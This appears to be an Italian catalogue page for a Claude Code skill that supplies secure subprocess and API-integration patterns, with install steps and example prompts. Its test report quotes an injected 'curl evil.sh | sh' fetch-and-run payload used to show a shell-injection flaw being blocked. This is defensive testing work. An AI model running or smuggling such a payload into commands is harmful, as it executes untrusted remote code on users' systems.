API Integration Patterns
Pattern API/CLI sicuri per subprocessi: no shell=True, comandi whitelistati, backoff di retry, validazione token.
Promosso
Cosa fa
Una skill di pattern di riferimento che fornisce pattern di codice sicuri per subprocessi, GitHub CLI, retry-con-backoff, autenticazione e limitazione della frequenza quando Claude scrive codice di integrazione API o CLI esterna. Si attiva su parole chiave subprocess/gh-cli/API-call/retry/auth ed esclude esplicitamente modifiche a funzioni interne o solo di configurazione.
Rapporto di test
Test reale CWE-78: il codice di base utilizzava shell=True con un nome di repository f-string, permettendo a un valore di repository creato di aggiungere 'curl evil.sh | sh'; la versione della skill con argv-array + shell=False ha passato la stessa stringa malevola tramite gh come un singolo argomento inerte. Concreto, non cosmetico.
Testato il: 2026-07-15 · Claude Code 2.x (agent harness)
Installazione
git clone https://github.com/akaszubski/autonomous-dev cd autonomous-dev mkdir -p ~/.claude/skills cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns
Comandi e prompt di esempio
/api-integration-patternsPattern API/CLI sicuri per subprocessi: no shell=True, comandi whitelistati, backoff di retry, validazione token.
Gli skill si attivano con richieste in linguaggio naturale, senza comandi da ricordare. Dopo l'installazione, prompt come questi lo attivano (in inglese):
Write a Python function that lists GitHub issues via the gh CLIAdd retry logic with exponential backoff to my API client codeHelp me safely handle subprocess calls without shell injection risk